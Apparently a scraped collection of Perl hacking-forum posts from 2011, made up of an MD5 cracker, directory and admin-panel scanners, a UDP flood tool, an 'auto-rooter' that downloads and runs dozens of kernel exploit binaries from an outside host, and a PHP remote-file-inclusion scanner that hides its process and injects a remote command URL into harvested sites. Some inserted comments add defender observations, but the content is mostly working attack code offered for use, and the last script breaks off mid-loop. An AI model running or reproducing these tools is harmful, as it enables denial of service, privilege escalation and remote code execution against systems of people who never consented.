my $code1 = "MD5 i°i ñi¸i¨i´i°i®i¢i i­: <b>";
my $code2 = "</b><br><form action=\"\">";
print "victorov.su              |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en securitystats.com/tools
sub cracker17 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://securitystats.com/tools/hashcrack.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["inputhash" => $hash, "type" => "MD5", "Submit" => "Submit"]);
my $content = $request->content;

my $code1 = "<font color=\"#FF0000\"><B><BR><BR>MD5 Hash Found!!</font></b><BR>".uc($hash)." = ";
my $code2 = "</td>";
print "securitystats.com        |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

# Look the hash up at md5crack.it-helpnet.de (GET the page, then POST the
# hash). A 23-character capture is how the site's "no result" cell looks,
# so it is reported as not found.
sub cracker18 {
    ($hash, $agent) = @_;
    my $url = "http://md5crack.it-helpnet.de/index.php?op=search";
    my $ua = LWP::UserAgent->new();
    $ua->agent($agent);
    $ua->get($url);    # response unused; kept so the request sequence is unchanged
    my $html = $ua->post($url, ["md5" => $hash, "submit" => "Search now"])->content;

    my ($open, $close) = ("</td><td>$hash</td><td>", "</td>");
    print "md5crack.it-helpnet.de   |   ";
    my ($plain) = $html =~ m/$open(.*)$close/;
    if (!defined $plain or length($plain) == 23) {
        print "Not Found\n";
    } else {
        print "Cracked: $plain\n";
    }
}
#30
Perl / Scaner de Directorios
Enero 27, 2011, 08:55:45 PM
Código: perl
#!/usr/bin/perl

#

#bY boER

use LWP::UserAgent;

# Shared agent for the scan: 10 s timeout and a fixed User-Agent string.
my $ua = LWP::UserAgent->new();
$ua->timeout(10);
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");

# OUT(), clear() and brute() are defined further down in the file.
unless ($ARGV[0]) {
    OUT("#############################################\n");
    OUT("\n Usage: perl $0 website\n");
    OUT("\n#############################################\n");
    exit(0);
}

system($^O =~ /Win/ ? "cls" : "clear");

# Header and the status-code legend.
for my $line (
    "#############################################\n",
    "        Scanner Directory!\n",
    "#############################################\n",
    " 200 - OK\n",
    " 401 - Authorization Required\n",
    " 403 - Forbidden\n",
    " 500 - Bad Hostname | Internal Server Error\n",
    "#############################################\n",
) {
    OUT($line);
}

# $webcl is a package global (no `use strict` in this script), as before.
$webcl = clear($ARGV[0]);
OUT("\n# Scanning: $webcl\n\n");
brute($webcl);
OUT("\n# Scanning Finished\n");

# Probe every entry of the built-in word list under $web (one GET each,
# sequential, no delay) and hand each status line to check_code().
#   $web - base URL ending in "/" (see clear())
# NOTE(review): $web, @paths, $path and $code are all package globals.
sub brute{

$web = shift;

# Fixed in-code word list of directory and file names; the chomp() below is
# a no-op on these literals.
@paths = ("access","active","adm","admin","_admin","administrator",

"administracion","_administracion","~administracion","administer",

"upload","uploads","~adm","~admin","~administrator","~guest","~mail",

"~operator","~root","~sys","~sysadm","~sysadmin","~test","~user","~www",

"~webmaster","admin_upload","admin_uploadpic","editpassword",

"manager_userinfo","manager_tongji","managerenter","incupfile","inc",

"upfile","admin_index","admin_admin","index_admin","index","admindefault",

"default","manage","login","manage_index","index_manage","admin1",

"admin_login","login_admin","ad_login","ad_manage","count","manager",

"adminlogin","adminuserlogin","adm_login","chklogin","adduser","adminuser",

"admin_user","edituser","adminadduser","adminmember","addmember","adminedit",

"admin_edit","up","upfiles","aadmin","admintab","admin_main","fileadmin",

"databases","includeinc","***","app","apacheasp","apps","archive","archives",

"asp","back","backup","back-up","bak","bakup","bak-up","basic","bea","bin",

"binaries","broken","c","cc","connections","ccs","cache","cgi","fcgi",

"cgibin","cgi-win","class","classes","classified","classifieds","code",

"common","credit","creditcards","cv","cvs","customer","customers",

"CYBERDOCS","CYBERDOCS25","CYBERDOCS31","d","dfiles","data","database",

"db","dbase","dbm","dbms","demo","dev","devel","develop","development",

"doc","docs","docs41","docs51","dms","e","email","downloads","ecommerce",

"ebriefs","error","errors","esales","echannel","esupport","etc","exec",

"executable","executables","extra","extranet","examples","exchange",

"fcgi-bin","functions","feedback","file","files","forum","forums","ftp",

"graphics","galeria","gallery","galerias","guestbook","guests","help",

"hidden","hide","home","homes","htm","html","imagen","images","icons",

"incs","include","includes","interactive","internet","intranet","java",

"javascript","js","jsp","keep","kept","ldap","lib","libs","libraries",

"links","log","logfiles","logs","lightbox2","mail","me","members","mine",

"mirror","mirrors","mp3","mp3s","ms","mssql","ms-sql","music","my","new",

"old","online","order","orders","pages","_pages","pass","passes","passwd",

"password","polls","passwords","perl","personal","personals","php","_php",

"phpincludes","pics","pl","pls","plx","press","priv","private","products",

"production","pub","public","removed","reports","root","sales","save",

"saved","scripts","secret","secrets","security","servlet","servlets",

"soap","soapdocs","source","site","sites","SiteServer","sql","src",

"staff","stats","statistics","ssi","stuff","support","temp","temps","test",

"text","texts","tmp","user","users","var","vb","vbs","vbscript","vbscripts",

"weblogic","www","xcache","xsql","zip","zips","W3SVC","W3SVC3","index.php",

"index.html","phpmyadmin","phpMyAdmin",".bash_history","upload.php",

"upload.asp","uploader.php","uploader.asp","phpinfo.php","_banners",

"_adv","468","88","ads","adv","ban","baners","bann","banner","banners",

"bannerz","be","begun","bn","bnr","cnstats","cnt","phpadsnew","server-status",

"server-info",".server-status",".server-info",".passwd","INSTALL","_vti_log",

"admcgi","_notes","_tmp","_temp","panel","_panel","~panel","upFiles","img",

"es","css","socios","Documentation","INSTALLsetup.php","Upfile","cgi-bin",

"content","secure","mysql","4Dbin","trustscn_pdos","trustscn_pdos1","_vti_bin",

"Connections","_mmServerScripts","bot","imag","lobatos","phpmyadm","Phpmyadmin",

"PhpMyAdmin","PhpGAdmin","PhpInclude","PhpIncludes","phpscripts","PhpScripts",

"_vti_txt","cgi-local","cgis","WS_FTP.LOG","User.php","Upload.php","AlbumDB.php",

"add_comment.php","add_photo.php","admin.php","adm.php","adm.asp","admin.asp","main",

"web","global","globals","uploader","logon","sign","signin","example","update",

"readme","client","clients","cmd","logfile","details","shtml","asa","jsa",

"txt","cfm","sav","nsf","bat","com","exe","dll","reg","tar","tar.gz","tgz",

"o","sh","member","auth","login.php","user.php","admin.php~","members.php",

"members.php~","configuration.php~","config.php~","Setting.php~","Settings.php~",

"Settings_bak.php~","Setting_bak.php~","config-bak.php~","member.php","users.php",

"webadmin.php","webadmin","miembro","miembros","administrador","administration",

"config.php.inc","config.php.inc~","configuration.php.inc","configuration.php.inc~",

"DBConnection.inc","includesDBConnection.inc","includesDBConnection.php.inc");

foreach $path(@paths){

chomp($path);

# status_line is "<code> <reason>", e.g. "404 Not Found"; LWP reports its
# own connection failures with a 500 status line as well.
$code = $ua->get($web . $path)->status_line;

check_code($code,$path);

}

}

# Print one result line for an interesting status; every other status (404,
# 3xx, ...) is dropped silently.
#   $ncode - status line from LWP, "<code> <reason>"
#   $path  - word-list entry that was probed
# Reads the global $webcl set in the main body.
# NOTE(review): the tests are unanchored substring matches, so "500" also
# fires for LWP's own "500 Can't connect ..." lines (the banner's "Bad
# Hostname" case) and the digits could match inside a reason phrase.
sub check_code{

$ncode = shift;

$path = shift;

$wp = $webcl . $path;

if($ncode =~ /200/){

OUT("$wp\t=>\t200 OK\n");

}

if($ncode =~ /401/){

OUT("$wp\t=>\t401 Authorization Required\n");

}

if($ncode =~ /403/){

OUT("$wp\t=>\t403 Forbidden\n");

}

if($ncode =~ /500/){

OUT("$wp\t=>\t500 Internal Server Error\n");

}

}

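# Normalise the target given on the command line into a base URL: prepend
# "http://" when no scheme is present and make sure it ends in "/", so that
# word-list entries can be appended directly.
#   $website - host or URL as typed by the user (undef is treated as "")
# Returns the normalised URL string.
sub clear{
my ($website) = @_;              # lexical: the original leaked a package global
$website = '' unless defined $website;

# Anything that already starts with "http" (http:// or https://) is kept.
if($website !~ /^http/){
$website = 'http://' . $website;
}
if($website !~ /\/$/){
$website .= '/';
}
return $website;
}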

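# Console output helper: writes $msg straight to STDOUT with syswrite, which
# bypasses perl's output buffering so progress lines appear immediately.
#   $msg - text to write, including any newline the caller wants
sub OUT{
my ($msg) = @_;                  # lexical instead of a package global
return unless defined $msg && length $msg;   # nothing to write (and no undef warning)
syswrite STDOUT, $msg;
return;
}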
Perl / Admin Control Panel Finder
Enero 27, 2011, 08:55:20 PM
#!/usr/bin/perl

##
#KuNdUz
##

#     !!!! * Insert string search = Login or login, Password or password, Username or username, Admin or admin, Sing or sing * !!!!

use IO::Socket;
use HTTP::Request;
use LWP::UserAgent;

# Admin-panel finder: asks for a site and a marker string, then requests a
# fixed list of 79 candidate admin paths and reports every page whose body
# contains the marker.  No `use strict`; everything below is a package global.
# `cls` and `title` are cmd.exe builtins, so these two calls only work on
# Windows and fail elsewhere.
system('cls');
system('title Admin Control Panel Finder');

print"\n";
print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
print "\t<                                    <\n";
print "\t>     Admin Control Panel Finder     >\n";
print "\t<                                    <\n";
print "\t> 08/10/08           Coded_By_KuNdUz >\n";
print "\t<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n";
print "\n";

print "~ Enter Site\n\n-> ";
$site=<STDIN>;
chomp $site;

# Only "http:" counts as a scheme here, so an https:// URL gets a second
# "http://" prepended.
if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";
print "~ Insert string search\n(ex: Username or Password or Senha or Admin vs..)\n\n-> ";
$string=<STDIN>;
chomp $string;
print "\n";

print "~ Scaning...\n\n";

# Candidate paths live in 79 separately named scalars ($a1..$a79) and are
# looked up by name in the loop below; some entries repeat (e.g. $a10/$a50).
$a1="admin1.php";
$a2="admin1.html";
$a3="admin2.php";
$a4="admin2.html";
$a5="yonetim.php";
$a6="yonetim.html";
$a7="yonetici.php";
$a8="yonetici.html";
$a9="admin/";
$a10="admin/account.php";
$a11="admin/account.html";
$a12="admin/index.php";
$a13="admin/index.html";
$a14="admin/login.php";
$a15="admin/login.html";
$a16="admin/home.php";
$a17="admin/controlpanel.html";
$a18="admin/controlpanel.php";
$a19="admin.php";
$a20="admin.html";
$a21="admin/cp.php";
$a22="admin/cp.html";
$a23="cp.php";
$a24="cp.html";
$a25="administrator/";
$a26="administrator/index.html";
$a27="administrator/index.php";
$a28="administrator/login.html";
$a29="administrator/login.php";
$a30="administrator/account.html";
$a31="administrator/account.php";
$a32="administrator.php";
$a33="administrator.html";
$a34="login.php";
$a35="login.html";
$a36="modelsearch/login.php";
$a37="moderator.php";
$a38="moderator.html";
$a39="moderator/login.php";
$a40="moderator/login.html";
$a41="moderator/admin.php";
$a42="moderator/admin.html";
$a43="moderator/";
$a44="account.php";
$a45="account.html";
$a46="controlpanel.php";
$a47="controlpanel.html";
$a48="admincontrol.php";
$a49="admincontrol.html";
$a50="admin/account.php";
$a51="admin/account.html";
$a52="adminpanel.php";
$a53="adminpanel.html";
$a54="admin1.asp";
$a55="admin2.asp";
$a56="yonetim.asp";
$a57="yonetici.asp";
$a58="admin/account.asp";
$a59="admin/index.asp";
$a60="admin/login.asp";
$a61="admin/home.asp";
$a62="admin/controlpanel.asp";
$a63="admin.asp";
$a64="admin/cp.asp";
$a65="cp.asp";
$a66="administrator/index.asp";
$a67="administrator/login.asp";
$a68="administrator/account.asp";
$a69="administrator.asp";
$a70="login.asp";
$a71="modelsearch/login.asp";
$a72="moderator.asp";
$a73="moderator/login.asp";
$a74="moderator/admin.asp";
$a75="account.asp";
$a76="controlpanel.asp";
$a77="admincontrol.asp";
$a78="admin/account.asp";
$a79="adminpanel.asp";

for ($i=1;$i<80;$i++){

# Symbolic reference: the bareword `a` concatenated with $i yields the name
# "a1".."a79" and $$add fetches that variable by name at run time.  This
# only works without `use strict 'refs'`; the chomp on it is a no-op.
$add=a.$i;
chomp $add;

$final=$site.$$add;

# A fresh UserAgent per request: no connection reuse, 30 s timeout each.
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

# $string is interpolated unescaped, so the user's marker is a regex, not a
# literal: metacharacters such as "." or "(" change the match or die here.
# The HTTP status is never checked, so a 404 page containing the word counts.
if($response->content =~ /$string/){
print " \n [+] Yepp -> $final\n\n";
}else{
print "[-] Not Found <- $final\n";
}
}
##
# KuNdUz
##
Perl / UDP Flooder
Enero 27, 2011, 08:54:52 PM
#!/usr/bin/perl
#####################################################
# udp flood.
######################################################

use Socket;
use strict;
use Getopt::Long;
use Time::HiRes qw( usleep gettimeofday ) ;

# UDP flood generator (volumetric denial of service): sends UDP datagrams to
# $ip as fast as the loop allows, or paced by --delay/--bandwidth, until
# --time expires or Ctrl-C.  On the wire it is one source spraying one host
# with NUL-padded "flood" payloads on random (or one fixed) ports.
our $port = 0;
our $size = 0;
our $time = 0;
our $bw   = 0;
our $help = 0;
our $delay= 0;

GetOptions(
"port=i" => \$port, # UDP port to use, numeric, 0=random
"size=i" => \$size, # packet size, number, 0=random
"bandwidth=i" => \$bw, # bandwidth to consume
"time=i" => \$time, # time to run
"delay=f"=> \$delay, # inter-packet delay
"help|?" => \$help); # help


my ($ip) = @ARGV;

if ($help || !$ip) {
  print <<'EOL';
flood.pl --port=dst-port --size=pkt-size --time=secs
         --bandwidth=kbps --delay=msec ip-address

Defaults:
  * random destination UDP ports are used unless --port is specified
  * random-sized packets are sent unless --size or --bandwidth is specified
  * flood is continuous unless --time is specified
  * flood is sent at line speed unless --bandwidth or --delay is specified

Usage guidelines:
  --size parameter is ignored if both the --bandwidth and the --delay
    parameters are specified.

  Packet size is set to 256 bytes if the --bandwidth parameter is used
    without the --size parameter

  The specified packet size is the size of the IP datagram (including IP and
  UDP headers). Interface packet sizes might vary due to layer-2 encapsulation.

Warnings and Disclaimers:
  Flooding third-party hosts or networks is commonly considered a criminal activity.
  Flooding your own hosts or networks is usually a bad idea
  Higher-performace flooding solutions should be used for stress/performance tests
  Use primarily in lab environments for QoS tests
EOL
  exit(1);
}

# Derive whichever of size/delay/bandwidth was not given; units follow the
# help text: size in bytes, delay in msec, bandwidth in kbps.
if ($bw && $delay) {
  print "WARNING: computed packet size overwrites the --size parameter ignored\n";
  $size = int($bw * $delay / 8);
} elsif ($bw) {
  $delay = (8 * $size) / $bw;
}

$size = 256 if $bw && !$size;

($bw = int($size / $delay * 8)) if ($delay && $size);

my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
# Without --time the loop runs for 1_000_000 s (about 11.5 days).
$endtime = time() + ($time ? $time : 1000000);
# Bareword filehandle; 17 is IPPROTO_UDP.  The return value is not checked.
socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " .
  ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n";
print "Interpacket delay $delay msec\n" if $delay;
print "total IP bandwidth $bw kbps\n" if $bw;
print "Break with Ctrl-C\n" unless $time;

die "Invalid packet size requested: $size\n" if $size && ($size < 64 || $size > 1500);
# --size counts the IP datagram: 28 = 20-byte IPv4 header + 8-byte UDP header.
$size -= 28 if $size;
for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  # pack "aN" pads "flood" with NULs up to $psize bytes: a constant payload
  # that is easy to signature in packet captures.
  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
  usleep(1000 * $delay) if $delay;
}
Perl / Auto-Rooteador
Enero 27, 2011, 08:54:01 PM
#!/usr/bin/perl 
# Exploit tools v1.0 coded by MeTRp0L - [email protected]
# Only for linux
# ur shell must have good perl and gcc..
# by MeTRp0L
{
# "Auto-rooter": fetches a series of precompiled privilege-escalation
# binaries from a third-party host over plain HTTP, makes each one
# world-writable and executable (chmod 777), runs it and prints `id` so the
# operator can see whether the euid changed.  Nothing is verified: whoever
# controls that host, or the network path, decides what gets executed on
# the machine running this script.
# Defender view: a burst of wget -> chmod 777 -> exec -> id from one process
# tree is a high-signal auditd/EDR pattern, and every dropped file is left
# behind in the working directory.
system("wget http://metrpol.webs.com/05");
system("chmod 777 05");
system("./05");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/2.6.9-55-2007-prv8");
system("chmod 777 2.6.9-55-2007-prv8");
system("./2.6.9-55-2007-prv8");
system("./2.6.9-55-2007-prv8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/55");
system("chmod 777 55");
system("./55");
system("./55");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/12");
system("chmod 777 12");
system("./12");
system("./12");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/18");
system("chmod 777 18");
system("./18");
system("./18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/krad2");
system("chmod 777 krad2");
system("./krad2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/06");
system("chmod 777 06");
system("./06");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/7");
system("chmod 777 7");
system("./7");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/8");
system("chmod 777 8");
system("./8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/8a");
system("chmod 777 8a");
system("./8a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/8bb");
system("chmod 777 8bb");
system("./8bb");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/8cc");
system("chmod 777 8cc");
system("./8cc");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/8x");
system("chmod 777 8x");
system("./8x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/9");
system("chmod 777 9");
system("./9");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com77");
system("chmod 777 77");
system("./77");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/78");
system("chmod 777 78");
system("./78");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/ptrace-kmod");
system("chmod 777 ptrace-kmod");
system("./ptrace-kmod");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/elflbl");
system("chmod 777 elflbl");
system("./elflbl");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/kmod");
system("chmod 777 kmod");
system("./kmod");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/newlocal");
system("chmod 777 newlocal");
system("./newlocal");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/27799");
system("chmod 777 27799");
system("./27799");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
# Source instead of a binary this time: compiled locally with gcc, which is
# why the header says the shell "must have good perl and gcc".
system("wget downloads.securityfocus.com/vulnerabilities/exploits/27704.c");
system("gcc 27704.c -o 27704"); 
system("chmod 777 27704");
system("./27704");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/k-rad3");
system("chmod 777 k-rad3");
system("./k-rad3 -t 1 -p 2");
system("./k-rad3 -t 1 -p 3");
system("./k-rad3 -t 1 -p 4");
system("./k-rad3 -t 1 -p 5");
system("./k-rad3 -t 1 -p 6");
system("./k-rad3 -t 1 -p 7");
system("./k-rad3 -t 1 -p 8");
system("./k-rad3 -t 1 -p 9");
system("./k-rad3 -t 1 -p 10");
system("./k-rad3 -t 1 -p 11");
system("./k-rad3 -t 1 -p 12");
system("./k-rad3 -t 1 -p 13");
system("./k-rad3 -t 1 -p 14");
system("./k-rad3 -t-p 2");
system("./k-rad3 -t-p 2");
system("./k-rad3 -t-p 3");
system("./k-rad3 -t-p 4");
system("./k-rad3 -t-p 5"); 
system("./k-rad3 -a -p 7");
system("./k-rad3 -a -p 7");
system("./k-rad3 -a -p 8");
system("./k-rad3 -a -p 8");
system("./k-rad3 -a -p 9");
system("./k-rad3 -a -p 9");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/pwned");
system("chmod 777 pwned");
system("./pwned");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/krad");
system("chmod 777 krad");
system("./krad -t 1 -p 2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/r00t");
system("chmod 777 r00t");
system("./r00t");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/2.4.34");
system("chmod 777 2.4.34");
system("./2.4.34");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/lezr-km");
system("chmod 777 lezr-km"); 
system("./lezr-km");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/mremap_pte");
system("chmod 777 mremap_pte"); 
system("./mremap_pte");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/ong_bak");
system("chmod 777 ong_bak"); 
system("./ong_bak -10023411");
system("./ong_bak -10029");
system("./ong_bak -10023");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/ptrace24");
system("chmod 777 ptrace24"); 
system("./ptrace24");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/pwned3");
system("chmod 777 pwned3"); 
system("./pwned3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/loginx");
system("chmod 777 loginx"); 
system("./loginx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/myptrace");
system("chmod 777 myptrace"); 
system("./myptrace");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/x");
system("chmod 777 x"); 
system("./x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://metrpol.webs.com/crond");
system("chmod 777 crond"); 
system("./crond");
system("id");
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/uselib24");
system("chmod 777 uselib24");
system("./uselib24");
system("id");
print "If u r r00t stop xpl with ctrl+c\n"; 
print "If u arent im sorry xpl session finished \n";
}
Perl / PHP Injection Scanner (Perl Code)
Enero 27, 2011, 08:53:33 PM
#!/usr/bin/perl

use LWP::Simple;
use IO::Socket::INET;



# Search-engine scraper plus RFI probe.  Flow: harvest result links for the
# given dork from Google and Yahoo "Cade", dedupe them, fetch every site and
# collect its outgoing links, then for each "param=" found append a remote
# include URL and flag the site when the response contains "root", "etc"
# and "boot" (presumably the output of the remote file's `ls /`).  Hits are
# appended to res.txt in the working directory.
# Defender view: the process renames itself to an httpd path, ignores
# INT/HUP/TERM and forks into the background - the hiding behaviour of a
# script meant to run on somebody else's web host.  /proc/<pid>/exe and
# cmdline still disagree with the fake name, and the fixed spykidsgroup.com
# include URL carried by every probe is a ready-made IOC for access logs.
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\t[ PHP injection scanner 5.0 priv8 version by poerschke ]\n\t[ irc.gigachat.net #spykids ]\n\n\n";

if(!@ARGV[0]){
print "\t[ use: perl php5.0.pl <procura> ]\n\n";
exit;
}
print "\t[ Camuflando pid ]\n";
# Fake process name, NUL-padded, plus signal ignores.  "PS" is not a signal
# name, so that last entry is a no-op.
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
# Daemonise: the parent exits and the child does all the work below.
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

print "\t[ Pid: $pid Processo: $processo ]\n";

# Scratch files in the cwd with random numeric names; $arq's "." prefix is
# overwritten on the next line, so it has no dot.
$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq = int rand(9999);

open(sites,">$arq");
print sites "";
close(sites);


$procura = @ARGV[0];
chomp $procura;
print "\t[ Procurando por $procura no Google ]\n";
# Hand-written HTTP/1.0 request per result page, 90 pages in steps of 10;
# bareword handles and unchecked open() throughout this script.
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
print $sock "Host: www.google.com.br";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
print $sock "Accept-Language: pt-br, pt;q=0.50";
print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
print $sock "Keep-Alive: 300";
print $sock "Connection: keep-alive";

@resu = <$sock>;
close($sock);
$ae = "@resu";
# Consume one <a href=...> at a time by rewriting the buffer; the nested
# filters drop Google's own translate/cache/navigation links.
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
  $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
  $uber=$1;
   if ($uber !~/translate/)
   {
   if ($uber !~ /cache/)
   {
   if ($uber !~ /"/)
   {
   if ($uber !~ /google/)
   {
   if ($uber !~ /216/)
   {
   if ($uber =~/http/)
   {
   if ($uber !~ /start=/)
   {
     open(arq,">>$arq");
          print arq "$uber\n";
          close(arq);
}}}}}}}}}
print "\t[ Procurando por $procura no Cade   ]\n";

for($cadenu=1;$cadenu <= 991; $cadenu +=10){

@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
  $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
  $uber=$1;

$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;

open(a,">>$arq");
print a "$uber\n";
close(a);
}}
print "\t[ Pronto sites pegos no google e cade ]\n";
print "\t[ Excluindo os sites repetidos ]\n";
# Dedupe via the global %si hash, which is never cleared and is reused for
# the probe-URL list further down.
$ark = $arq;
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);


$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
{$sites[$a] = $_;
  chomp $sites[$a];
  $a++;
  $b++;}
close(ae);
print "\t[ Total de sites para scanear: $a ]\n";
# Per harvested site: fetch it, write every <a href="..."> target (made
# absolute with the site as prefix when it has no scheme) to $caxe.
for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
      print file "";
close(file);
open (file, ">$caxe1");
      print file "";
close(file);
$k=0;
$e=0;
$data=get($sites[$a]) or next;
  while($data=~ m/<a href=".*?">.*?<\/a>/){
  $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
  $ubersite=$1;

  if ($ubersite =~/"/)
   {
   $nu = index $ubersite, '"';
   $ubersite = substr($ubersite,0,$nu);
   }
if ($ubersite !~/http/)
{$ubersite = $sites[$a].'/'.$ubersite;}
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n";
close(file);
}

# The probe payload: a remote file whose inclusion is expected to run
# `ls /`.  It is appended to every link parameter ("...param=") found, once
# after the last "=" and once after the first "=", so each candidate site
# sees this exact string in its access log.
$lista1 = 'http://www.spykidsgroup.com/spy.gif?&cmd=ls%20/';
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
$t=1;
while ($t < $y)
   {
    if ($ja[$t] =~/=/)
      {
       $num = rindex $ja[$t], '=';
       $num += 1;
       $ja[$t] = substr($ja[$t],0,$num);   
            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
            print jaera "$ja[$t]$lista1\n";
            close(jaera);
        $num = index $ja[$t], '=';
        $num += 1;
        $ja[$t] = substr($ja[$t],0,$num);       
        $num1 = rindex $ja[$t], '.';
        $subproc = substr($ja[$t],$num1,$num);
         
            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
            print jaera "$ja[$t]$lista1\n";
            close(jaera);
      }
     $t++;
     }
$ark = "$caxe1";
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
